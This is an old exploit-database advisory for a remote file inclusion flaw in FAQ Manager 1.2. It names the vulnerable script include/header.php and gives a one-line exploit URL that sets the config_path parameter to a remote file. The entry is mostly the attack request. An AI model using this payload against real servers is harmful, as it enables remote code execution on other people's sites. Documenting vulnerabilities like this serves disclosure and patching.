id: 4255
date: 11/25/2008
title: FAQ Manager 1.2 (config_path) Remote File Inclusion Vulnerability
author: ZoRLu
cves: 

=================================================================
FAQ Manager 1.2 (config_path) Remote File Inclusion Vulnerability
=================================================================



[~] FAQ Manager 1.2 Remote File injulide : ) )
[~]
[~] download: http://www.4yoursite.nl/downloads/faq_man_1.2.zip
[~]
[~] ----------------------------------------------------------
[~] Discovered By: ZoRLu 
[~]
[~] N0T: YALNIZLIK, YiTiRDi ANLAMINI YALNIZLIGIMDA : ( (
[~]
[~] N0T: RedHaK Kardesime ozel tesekurler.
[~] -----------------------------------------------------------

file:

include/header.php

exp:

http://localhost/script/include/header.php?config_path=ZoRLu.txt?


[~]----------------------------------------------------------------------




#  0day.today [2023-03-24]  #